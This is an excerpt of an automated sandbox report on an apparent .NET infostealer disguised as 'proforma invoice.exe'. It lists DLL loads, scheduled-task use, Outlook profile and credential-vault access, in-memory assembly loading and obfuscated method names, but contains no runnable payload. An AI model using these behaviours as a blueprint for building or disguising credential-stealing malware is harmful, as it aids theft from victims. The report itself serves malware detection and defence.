Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\proforma invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\proforma invoice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: proforma invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: proforma invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, jA2dlspLgAa2OFDOi4.cs	.Net Code: ogansgY0NU System.Reflection.Assembly.Load(byte[])
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, jA2dlspLgAa2OFDOi4.cs	.Net Code: ogansgY0NU System.Reflection.Assembly.Load(byte[])
Source: 0.2.proforma invoice.exe.76a0000.3.raw.unpack, L2.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, jA2dlspLgAa2OFDOi4.cs	.Net Code: ogansgY0NU System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD4E89 push ss; iretd	0_2_00AD4E8A
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD4E90 push ss; iretd	0_2_00AD4E92
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD3BC1 push cs; iretd	0_2_00AD3BC2
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD3C98 push cs; iretd	0_2_00AD3C9A
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD3C91 push cs; iretd	0_2_00AD3C92
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 0_2_00AD3E28 push cs; iretd	0_2_00AD3E2A
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_0723FD09 push 8B0429F0h; retf	9_2_0723FD14
Source: C:\Users\user\Desktop\proforma invoice.exe	Code function: 9_2_072391AE push FFFFFF8Bh; iretd	9_2_072391B0
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 10_2_0A526A37 push es; retf	10_2_0A526A46
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_02B2FF19 push es; retf	14_2_02B2FF1C
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_02B2FCE1 push ecx; retf	14_2_02B2FD24
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_06C2FBF3 push ecx; retf	14_2_06C2FBFA
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Code function: 14_2_06C2F9A2 push ecx; retf	14_2_06C2F9AB

Source: proforma invoice.exe	Static PE information: section name: .text entropy: 7.708817624872848
Source: CGWlZD.exe.0.dr	Static PE information: section name: .text entropy: 7.708817624872848

Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, WiHmOQGBiauFOXCSRe.cs	High entropy of concatenated method names: 'huuQBRM76y', 'BkfQcPJOeR', 'pZuQ4gymnm', 'OGvQT38mqx', 'YcZQphG3SU', 'zOE4OaUmEC', 'Oxj4mkgNM4', 'IUw4jQvMWd', 'vVZ41df6e7', 'ruR4ZYHjNP'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, PyOApGje3N2O4YRLJq.cs	High entropy of concatenated method names: 'v58WiqxZpW', 'S6MWJN2Keb', 'zaaWWQNX4Q', 'TQcWuWUuGk', 'QfnWoHyagD', 'fX8WIysnMq', 'Dispose', 'FpbVUHCJE8', 'gVfVcBA9rY', 'BnaVMKKTE5'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, vVbLP0DwljmXtWWceF.cs	High entropy of concatenated method names: 'gFJFMZ153v', 'nXvF4Q7OYg', 'DuiFQsQhpq', 'Y2rFTo07s8', 'kNyFWw0lal', 'XsOFpDS8mI', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, Rq0BwamMBeOLUYY5aR.cs	High entropy of concatenated method names: 'b2aJ1IrynY', 'PTbJDSakn0', 'BRUVfZsACg', 'WjHVgJnrcN', 'ggnJHJW9LJ', 'PZfJ9dsZik', 'pZgJvoMpfx', 'NJnJtF8c7t', 'AcFJ5j3iSF', 'g8kJStnKxe'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, sfw71jgg3t49MjXGUgn.cs	High entropy of concatenated method names: 'R8wFD7a2qZ', 'uGgFzl7Txb', 'j1Zufqs2oo', 'cNKugxNCtU', 'OERur8fRWT', 'p9DuYkDOUN', 'Jgoun56KhE', 'lkcuBclZVu', 'iNOuUm6WUP', 'ONiuciBxnM'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, mfjQw5qpQAlqUAiSkP.cs	High entropy of concatenated method names: 'vjectVphMe', 'RZEc5BKtLu', 'HnNcSnRlfA', 'JK9cXMCiQ8', 't4dcOAmybs', 'zoqcmCMUfB', 'SQVcjCRlPV', 'Mh5c1ViRsc', 'St6cZNHjvi', 'RTZcDJKlj4'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, KCe7psr6YgQ0YnUNYD.cs	High entropy of concatenated method names: 'gmJsdCXUD', 'WkMlJKWen', 'n73dicphk', 'wUWRAaryA', 'ucG7iskxH', 'mvJLjYJDk', 'eK00QUAeoM5aQ7Cd4H', 'vv4sMINhKQJCuHKonv', 'EdsVwFdcD', 'qAOFUfqTQ'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, jA2dlspLgAa2OFDOi4.cs	High entropy of concatenated method names: 'hGLYBbvBFT', 'UUhYU0O2H4', 'xWSYcJDbbH', 'AHpYMrEqln', 'AwCY48046Y', 'iwLYQtGmRe', 'NPqYTOocTh', 'RKfYpMWUIy', 'n53Y6qo7Bk', 'Lh7YwQCx3Q'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, HsB6cEhmL1Dnenbik0.cs	High entropy of concatenated method names: 'iH1TeFwC5S', 'xlFTE54dFb', 'PtxTsgOeAj', 'KCnTlasA3M', 'SdCTAFtE21', 'dkMTdgynPe', 'lj6TRW3LLD', 'X8dTqLYHLd', 'vAsT7fpqth', 'gb4TL178HV'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, R6wLMqt5jEb2YGGg9e.cs	High entropy of concatenated method names: 'GRbiPT49Da', 'Cj4i9taUKW', 'd2jitwVJDU', 'QSHi5EjkPZ', 'addiaTjPbN', 'AEXikZrvF5', 'ymRi8tPP4C', 'wOji2h95oX', 'RvWixTHh7l', 'MJ0iKwjKAg'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, uqFF1RzSdGFrHl5b4x.cs	High entropy of concatenated method names: 'OMmFdCmYN4', 'PNKFqtkV7v', 'FCyF70VFq3', 'Jr0FGXZxAg', 'cPNFaC7VQC', 'aEGF8poMdE', 'q6KF2kAOfs', 't1pFIUoC7V', 'JOFFeJl5QZ', 'n2wFEudfUK'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, VUNrkTXdX06dje6RkF.cs	High entropy of concatenated method names: 'afvJw09PYa', 'dVnJyQFW9s', 'ToString', 'KxuJUCfky6', 'HxAJc2nKkm', 'FsQJMgCpFZ', 'YHmJ4rp1dg', 'bFHJQISASA', 'yjLJTI7PHk', 'up8JpHZQam'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, eKx1LZviwh9iXuwZd9.cs	High entropy of concatenated method names: 'IWMNqEKv1S', 'XBEN7mEyBe', 'wbuNGsxdY3', 'AA4NacHHQn', 'CpZN849UE9', 'scoN2AHH8a', 'nD7NKZx1V5', 'EBgN3ZoWQN', 'IfcNP9uI53', 'EfyNHAAWBl'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, syJphlcTajaUCfV0FF.cs	High entropy of concatenated method names: 'Dispose', 'o2OgZ4YRLJ', 'werraI3qGK', 'Vn7EDJgkMW', 'DfRgDlGX0c', 'xEOgzuOU63', 'ProcessDialogKey', 'OTqrfBVYhh', 'hagrgQF8t2', 'DLxrroVbLP'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, sBAJnnnSn1gmI7iGZs.cs	High entropy of concatenated method names: 'vTygTfjQw5', 'kQAgplqUAi', 'poQgwGU4bb', 'pvCgyPfLNj', 'Gsrgi1ojiH', 'VOQg0BiauF', 'u7lo5UUBwV5WPQSGYp', 'VUaBvKf4B36YI99wcL', 'HegggeAaGk', 'ajXgYUk6eF'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, nSt0wLKSpDoHL65hAM.cs	High entropy of concatenated method names: 'kf9TUt6qJb', 'dEhTM3ntPg', 'DP9TQXxtkG', 'dhoQD56ZD1', 'pUSQz9guBa', 'ObkTfQwQdy', 'ueyTgigWcu', 'IthTrwFKcw', 'HPwTYyvdYA', 'TD6TnG9HWi'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, YAC4Z07oQGU4bb0vCP.cs	High entropy of concatenated method names: 'yvMMlTfH9j', 'NWeMdMNaOt', 'jqvMqcZ8RB', 'HEtM79QLkg', 'moYMi55LPx', 'OLcM0JTxie', 'x1oMJwDyDT', 'yKAMVDbWU3', 'fRxMWs8bdx', 'xEdMFxo3gW'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, icgbEF8LHdvAJJNCZN.cs	High entropy of concatenated method names: 'j1fQIUNn0f', 'AlqQeimjtI', 'xVmQsPB0tl', 'g12QljmIZO', 'jhqQd1XopS', 'yMaQRnfD7e', 'wuIQ7tO5k6', 'EvYQLiywYW', 'VXkC8HMQrSnXDQoNWFt', 'A4WOskM8E3RCfxTIBT3'
Source: 0.2.proforma invoice.exe.42f1a78.1.raw.unpack, DBVYhhZ4agQF8t2qLx.cs	High entropy of concatenated method names: 'zZTWG8F2PP', 'VKoWaJlAPy', 'i31Wk5ZP0k', 'qtqW8f6BPa', 'Fn5W2oUOnK', 'n5CWxIPHo5', 'vZ7WKQCByS', 'MLyW33sV6R', 'kd8WheLstB', 'RouWPxUC5g'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, WiHmOQGBiauFOXCSRe.cs	High entropy of concatenated method names: 'huuQBRM76y', 'BkfQcPJOeR', 'pZuQ4gymnm', 'OGvQT38mqx', 'YcZQphG3SU', 'zOE4OaUmEC', 'Oxj4mkgNM4', 'IUw4jQvMWd', 'vVZ41df6e7', 'ruR4ZYHjNP'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, PyOApGje3N2O4YRLJq.cs	High entropy of concatenated method names: 'v58WiqxZpW', 'S6MWJN2Keb', 'zaaWWQNX4Q', 'TQcWuWUuGk', 'QfnWoHyagD', 'fX8WIysnMq', 'Dispose', 'FpbVUHCJE8', 'gVfVcBA9rY', 'BnaVMKKTE5'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, vVbLP0DwljmXtWWceF.cs	High entropy of concatenated method names: 'gFJFMZ153v', 'nXvF4Q7OYg', 'DuiFQsQhpq', 'Y2rFTo07s8', 'kNyFWw0lal', 'XsOFpDS8mI', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, Rq0BwamMBeOLUYY5aR.cs	High entropy of concatenated method names: 'b2aJ1IrynY', 'PTbJDSakn0', 'BRUVfZsACg', 'WjHVgJnrcN', 'ggnJHJW9LJ', 'PZfJ9dsZik', 'pZgJvoMpfx', 'NJnJtF8c7t', 'AcFJ5j3iSF', 'g8kJStnKxe'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, sfw71jgg3t49MjXGUgn.cs	High entropy of concatenated method names: 'R8wFD7a2qZ', 'uGgFzl7Txb', 'j1Zufqs2oo', 'cNKugxNCtU', 'OERur8fRWT', 'p9DuYkDOUN', 'Jgoun56KhE', 'lkcuBclZVu', 'iNOuUm6WUP', 'ONiuciBxnM'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, mfjQw5qpQAlqUAiSkP.cs	High entropy of concatenated method names: 'vjectVphMe', 'RZEc5BKtLu', 'HnNcSnRlfA', 'JK9cXMCiQ8', 't4dcOAmybs', 'zoqcmCMUfB', 'SQVcjCRlPV', 'Mh5c1ViRsc', 'St6cZNHjvi', 'RTZcDJKlj4'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, KCe7psr6YgQ0YnUNYD.cs	High entropy of concatenated method names: 'gmJsdCXUD', 'WkMlJKWen', 'n73dicphk', 'wUWRAaryA', 'ucG7iskxH', 'mvJLjYJDk', 'eK00QUAeoM5aQ7Cd4H', 'vv4sMINhKQJCuHKonv', 'EdsVwFdcD', 'qAOFUfqTQ'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, jA2dlspLgAa2OFDOi4.cs	High entropy of concatenated method names: 'hGLYBbvBFT', 'UUhYU0O2H4', 'xWSYcJDbbH', 'AHpYMrEqln', 'AwCY48046Y', 'iwLYQtGmRe', 'NPqYTOocTh', 'RKfYpMWUIy', 'n53Y6qo7Bk', 'Lh7YwQCx3Q'
